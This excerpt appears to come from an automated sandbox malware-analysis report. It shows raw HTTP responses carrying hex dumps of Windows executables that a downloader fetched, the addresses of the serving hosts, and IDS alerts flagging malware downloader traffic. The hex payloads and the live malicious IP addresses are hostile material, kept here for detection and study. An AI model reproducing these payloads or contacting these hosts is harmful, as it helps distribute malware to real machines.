00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 17 00 00 00 20 00 00 00 18 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 40 00 00 00 08 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 10 24 00 00 40 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 02 00 69 00 00 00 00 00 00 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 72 01 00 00 70 72 d0 00 00 70 28 02 00 00 06 de 03 26 de 00 28 0a 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 7e 04 00 00 04 17 28 06 00 00 0a 1f 28 28 07 00 00 0a 72 3a 01 00 70 28 08 00 00 0a 28 09 00 00 0a de 03 26 de 00 16 28 0a 00 00 0a 2a 00 00 00 01 34 00 00 00 00 00 00 11 11 00 03 01 00 00 01 00 00 14 00 11 25 00 03 01 00 00 01 00 00 28 00 07 2f 00 03 01 00 00 01 00 00 3c 00 23 5f 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0b 00 00 0a 0a 06 02 6f 0c 00 00 0a 06 03 6f 0d 00 00 0a 06 28 0e 00 00 0a 6f 0f 00 00 0a 06 17 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 28 12 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 13 30 04 00 6e 01 00 00 02 00 00 11 18 8d 13 00 00 01 13 0b 11 0b 16 72 8a 01 00 70 a2 11 0b 17 72 9a 01 00 70 a2 11 0b 0a 73 14 00 00 0a 0b 28 15 00 00 0a 13 0c 16 13 0d
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:44 GMTContent-Type: application/octet-streamContent-Length: 8704Last-Modified: Tue, 27 Feb 2024 04:20:02 GMTConnection: keep-aliveETag: "65dd62f2-2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 71 41 c8 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 38 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 74 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 c2 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 c2 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 f4 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 16 01 00 70 72 f4 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:49 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 9c d1 3d 64 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 18 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 16 00 00 00 20 00 00 00 18 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 28 06 00 00 00 40 00 00 00 08 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 fc 23 00 00 d4 12 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 02 00 69 00 00 00 00 00 00 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 72 01 00 00 70 72 d0 00 00 70 28 02 00 00 06 de 03 26 de 00 28 0a 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 7e 04 00 00 04 17 28 06 00 00 0a 1f 28 28 07 00 00 0a 72 3a 01 00 70 28 08 00 00 0a 28 09 00 00 0a de 03 26 de 00 16 28 0a 00 00 0a 2a 00 00 00 01 34 00 00 00 00 00 00 11 11 00 03 01 00 00 01 00 00 14 00 11 25 00 03 01 00 00 01 00 00 28 00 07 2f 00 03 01 00 00 01 00 00 3c 00 23 5f 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0b 00 00 0a 0a 06 02 6f 0c 00 00 0a 06 03 6f 0d 00 00 0a 06 28 0e 00 00 0a 6f 0f 00 00 0a 06 17 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 28 12 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 13 30 04 00 5c 01 00 00 02 00 00 11 17 8d 13 00 00 01 13 0b 11 0b 16 72 74 01 00 70 a2 11 0b 0a 73 14 00 00 0a 0b 28 15 00 00 0a 13 0c 16 13 0d 2b 36 11 0c 11 0d 9a 0c 06
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:54 GMTContent-Type: application/octet-streamContent-Length: 8704Last-Modified: Thu, 24 Oct 2024 17:17:14 GMTConnection: keep-aliveETag: "671a811a-2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 a8 90 b6 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 68 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e6 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 08 01 00 70 72 e6 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:00 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 97 8f 6d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 6c 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e6 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 08 01 00 70 72 e6 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:05 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 e0 3c 6c 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 98 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 70 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e6 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 08 01 00 70 72 e6 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:11 GMTContent-Type: application/octet-streamContent-Length: 9728Last-Modified: Fri, 07 Mar 2025 04:29:22 GMTConnection: keep-aliveETag: "67ca7622-2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 20 fb d0 4d 41 95 83 4d 41 95 83 4d 41 95 83 6a 87 ee 83 47 41 95 83 44 39 06 83 4e 41 95 83 4d 41 94 83 7e 41 95 83 44 39 00 83 4c 41 95 83 44 39 16 83 58 41 95 83 44 39 11 83 4e 41 95 83 44 39 04 83 4c 41 95 83 52 69 63 68 4d 41 95 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a1 e6 ca 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0c 00 00 00 16 00 00 00 00 00 00 c4 14 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 51 56 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 23 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 0a 00 00 00 10 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f4 08 00 00 00 20 00 00 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 5c 09 00 00 00 30 00 00 00 06 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 01 00 00 00 50 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox View | IP Address: 91.202.233.141
    Source: Joe Sandbox View | ASN Name: BA-TELEMACH-ASTelemachdooSarajevoBA
    Source: Joe Sandbox View | ASN Name: BUZTON-JV-ASUZ
    Source: Joe Sandbox View | ASN Name: M247GB
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49589 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49608 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49610 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49596 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49635 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49637 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49616 -> 45.93.20.18:80
